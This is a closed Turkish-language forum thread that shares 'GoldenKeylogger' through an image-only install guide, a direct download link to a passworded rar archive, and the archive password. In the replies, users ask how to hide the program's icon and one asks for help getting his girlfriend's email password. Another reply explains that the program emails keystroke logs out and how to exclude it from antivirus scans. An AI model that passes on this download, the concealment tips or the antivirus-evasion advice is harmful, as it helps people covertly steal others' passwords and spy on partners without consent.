GoldenKeylogger ! Merak edilmeyecek gibi Değil;) [ResimliAnlatım] !!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
anlatım guzel emek guzel zıp kodu ney ama onu bana yazın lutfen

Öncelikle değerli paylaşımın için teşekkürler arkadaşım. Değerli paylaşımlara her zaman saygımız sonsuz. Yükledem ve kuracağım .
Ancak konunun bütününde ikonu gizlemeyi daha sonra anlatacağım demişsin bu konu hakkındaki bilgilerinide bekliyoruz.

IIdamnedII' Alıntı:
anlatım guzel emek guzel zıp kodu ney ama onu bana yazın lutfen
Eğer dikkat eder konuyu iyi takip edersen zip şifresi bir çok yerde tekrarlanmaktadır.

BEn kullanıyom Bu keylogger ı..Süper bi şey..
Kendimde denedim şifreleri yolladı bana =)

gercekten gusel paylasım emegınden dolayı tesekur edrım allah rası olsun bılgı paylastıkca orenılır yıne tesekur edrım elıne koluna saglık SaOl

programın ıyılıgı veya kotulugu programı kullanım amacınıza gore degısır arkadaslar. bu programı brısının şifrelerını çalmak içinde kullanabılırsınız veya evde cocugunuzu takıp etmek ıcınde kullanabılırsınız. sıze kalmıs yanı. veya kendı bılgısayarınıza kurarsınız sızden baska bılgısayarınızı kullananların nelerle ugrastugunada bakabılırsınız. Programda vırus blmasının sebebı sonucta bır keylogger yanı basılan tusları kaydeden program buda antıvısurler tarafından tehlıkelı yazılım olarak goruluyor ayrıca nete cıkarak tus loglarını maıl adresıne gonderıyor. bu yondende spyware olarak algılanıo olabılır. kurulacak makınadakı antıvırus yazılımına gore tara dısı bırakılacak dosyalara eklenebılır sımdıkı tum antıvırus yazılımlarında bu ozellık var. dedıgım gıbı sızın kullanım amacınıza gore programın faydası veya zararı olacaktır...

turk_hard ben programı kurdum herşeyi adım adım yaptım fakat klavye girdilerini kaydetmiyo bu sorunu nasıl çözebilirim??

ya şu gizlemeyide paylaşsak artık sağ tarafda keyloger resmen ben burdayım sakın şifreni girme gibi bişe oluyo böle bi anlamı yok =S

Bişeyide sormak istiyorum ben ayarlardan Program ekle kaldırda görünme kısmını kapattım ama şimdi tekrar açamıyorum programı kaldırmak istesem nerden kaldırcam ??

başlat çalıştırdan programın kurulu olduğu klasörü açabilirsin
sağ alttaki iconuda ctrl+shift+f7 ye basatak kaldıdırsın

kardes linki yeniden yazarmısın ben tıklıyorum açılmıyo

arkadaşlar bu mail sorununa kimse bakmamış acaba sorun mu var yoksa mail atmıyormu. bana mail atan lazım. o yüzden açıklama yaparsanız sevinirim.

zıp dosyasından bır şeyler yap diyorsun da ne yapacam bılmıyorum ama mütişsın tşk

kardeşim emegine çok saol da kendi pc indeki bilgileri için geçerli degilmi.başka bir pcdeki bilgliere nası ulaşıcaz:)kız arkadaşımın mail şifresini bulmam lzmda yardım lütfen.bi çok key logger denedm ama çalştıramadm

Patron Masa Ustune Kopyaliyom Fakat Serial Numara Diye Bisey Var Onu Napcam Yardim Pls

kardesım emegıne saglık herkes hak ettıgı degerı bulur emege saygı arkadaslar

ALINTIDIR ARKADAŞLAR!..yazara TEŞEKKÜRLER

:biggrin :aşk :clap
TuRK_HaRD' Alıntı:
Evet arkadaşlar hepimizin bir keyloggera ihtiyacı olmuştur. Olmayanların bile birgün mutlaka ihtiyacı olacaktır. Ve bende Düz yazı yazmak yerine arşivlik bir çalışma olması nedeniyle resimli bir anlatım yaptım. Umarım herkes beğenir.

Önce aşağıdaki linkteki rarlı dosyayı indirin.Daha sonra aşağıdakilerin hepsini aynen uygulayın.

1.jpg

Next butonuna basarak ilerleyin.

2.jpg

3.jpg

4.jpg

5.jpg

7.jpg

9.jpg

10.jpg

11.jpg

12.jpg

İnce Ayar

13.jpg

14.jpg

15.jpg

16.jpg

17.jpg

18.jpg

Herşey bu kadar sorularınız ve sorunlarınız için ben buradayım.

Direk download = http://turkhard.hell-world.org/GoldenKeylogger/GoldenKeylogger__by_TuRK_HaRD.rar

rar şifresi = turk_hard

[ALINTIDIR]

Beğendiğiniz paylaşımlarda
TEŞEKKÜR BUTONU'nu kullanmayı unutmayın..

merhaba .kardes programi kurdum gayet gusel calisiyor.fakat sorun su programın gonderigi mail 1 k .we hic birsey yok yani bos yardim plzzzzzzzzzzzzz

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri